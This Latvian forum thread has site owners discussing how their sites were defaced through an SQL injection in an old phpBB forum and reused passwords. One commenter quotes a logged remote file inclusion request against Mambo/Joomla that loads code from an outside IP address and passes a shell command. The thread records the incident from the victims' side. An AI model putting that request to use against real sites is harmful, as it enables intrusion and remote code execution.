Script kiddy neliek mieru joprojām :( Pagāšnakt gan mako.sauc.lv, gan vesture sauc.lv piedirsuši ar http://milw0rm.com/ exploitu palīdzību. Standarta SQL injection, cik varu spriest. Rokas nolaižas un nezinu, kā sevi motivēt tālāk ar šiem bezmaksas projektiem strādāt.
Paldies vismaz par to, ka nenoraadiiji linku uz wikipeediju japaanju valodaa, blja. Nu nav mana anglju valoda tik spiidosha, lai uz pagjiraam meegjinaatu tamaa kauchko lasiit.
Ufff. Nu, ļautiņi, kas atrod citu uzrkstītu programmu, kurā jāieraksta uzburukuma mērķa adrese, un jānospiež enter, lai sadirstu citu vairāku mēnešu darbu. Un tad viņi jūtas hakeri un baisi gudrāki par to, kura lapu sajājuši.
Nez, pirmdien, kad servera īpašnieks pie saviem dzelžiem tiks, uzzināšu. Bet IMHO, ja script kiddy nemāk proxy lietot, tad viņš ir galīgi dumjš, un uz to es cerēt nevaru.
Cerēt uz to nevar, bet reizēm vienalga var pabrīnīties par cilvēku stulbumu. Varbūt kādreiz, ja būs labs prāts un reāla satikšanās, varētu vienu otru brīnumu pastāstīt ;-) P.S. Un ja tajā brīdī vēl atcerētos ;-))
meegjinaat dabuut kaadu kas to lietu pieskata, vai arii nezimantot populaaraas un diemzheel krietni caurumainas gatavas sisteemas, koes citu tev varu ieteikt
Nelīdzētu registered user only. 1. Bija vecs projekts ar cauru phpBB forumu, caur kuru veica SQL inject. 2. Es, savā stulbībā, nepadomāju,ka tam mudakam tagad ir mana parole,no SQL izvilkta, ko lietoju vairākos standarta projektos (tas man tagad iemācīs veselīgu paranoju). 3. Mudaks ar šo paroli tika pie viena mana e-maila. Un tur bija logini/paroles vairākiem saitiem. Ko viņš nevilcinājās izmantot. Pie kam ne normāli deface uztaisot, bet nonesot nafig. 4. Tagad raksimies pa Latnet un ML un citu provideru logiem, skatoties transakciju vēsturi. Ja izdosies atrast IP, kas nav proxy - tad man drusku žēl tā huligāna. Projektu īpašnieki ir gatavi vērsties policijā.
Tā kā es sekoju līdzi trafikam uz lapu, tad jau kādu laiciņu parādās interesanti ieraksti ar aptuveni šādu pieprasījumu: /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid ]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/
Pagūglējot, manīju ka mainīgie ar tādiem nosaukumiem un līdzīgos virknējumos tiek izmantoti lapās kuras izmanto Mambo CMS (tagad saucas Joomla). Varētu padomāt ka šams ir caurs..
Ja nopietni, tad mušas runā, ka tas trafiks nāk no "Defacing Tool 2.0 by r3v3ng4ns".